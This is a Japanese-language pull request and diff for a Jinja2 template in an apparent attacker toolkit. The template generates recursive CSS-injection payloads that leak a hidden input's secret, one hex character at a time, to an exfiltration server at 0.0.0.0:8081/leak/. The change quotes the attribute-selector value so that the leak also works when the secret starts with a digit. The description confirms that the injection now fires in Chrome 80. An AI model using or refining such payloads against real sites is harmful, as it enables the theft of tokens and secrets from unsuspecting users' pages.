### PR TITLE
secretに数字から始まる文字列が入っていた場合に、css injectionが刺さらない問題を解決しました。

### DIFF
--- a/recursive/attacker/templates/tmpl.jinja2
+++ b/recursive/attacker/templates/tmpl.jinja2
@@ -1,7 +1,7 @@
 @import "http://0.0.0.0:8081/css/{{ index+1 }}.css";
 
 {% for try_secret in "0123456789abcdef" %}
-input[value^={{ known_secret + try_secret }}]{{ ":first-child" * index }}{
+input[value^="{{ known_secret + try_secret }}"]{{ ":first-child" * index }}{
     background: url("http://0.0.0.0:8081/leak/{{ known_secret + try_secret }}");
 }
 {% endfor %}


### PR DESCRIPTION
### バグの内容

secretの中身が数字で始まる文字列の場合、cssのvalueにマッチせず、`http://0.0.0.0:8081/leak/?.css` が発火しないため、css injectionが開始されない

![image](https://user-images.githubusercontent.com/3713845/75058313-1ea91a00-551e-11ea-9129-9d228c1f8190.png)

### 修正内容

cssファイルの `input[value^=]` の値がダブルクオートで囲われておらず、マッチしなかったため。
ダブルクオートを追加することでcss injectionが動いてくれました。

![image](https://user-images.githubusercontent.com/3713845/75058487-6b8cf080-551e-11ea-83b7-84b9c2bd16ea.png)

### 再現したバージョン

Google Chrome Version 80.0.3987.106 (Official Build) (64-bit)